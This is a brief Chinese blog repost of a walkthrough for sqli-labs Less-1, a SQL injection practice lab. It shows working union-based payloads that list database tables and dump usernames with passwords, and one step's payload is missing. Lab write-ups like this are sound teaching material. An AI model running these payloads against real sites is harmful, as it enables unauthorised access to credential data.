LESS-1
Posted lql1440825777
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了LESS-1相关的知识,希望对你有一定的参考价值。
爆表payload
?id=-1‘ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
查到 emails,referers,uagents,users ,显然users是用户数据表
爆列名(字段)payload
爆值payload
?id=0‘ union select 1,2,group_concat(username,0x3a,password) from users--+
0x3a: 0x是十六进制标志,3a是十进制的58,是ascii中的 ‘:‘ ,用以分割pasword和username。
以上是关于LESS-1的主要内容,如果未能解决你的问题,请参考以下文章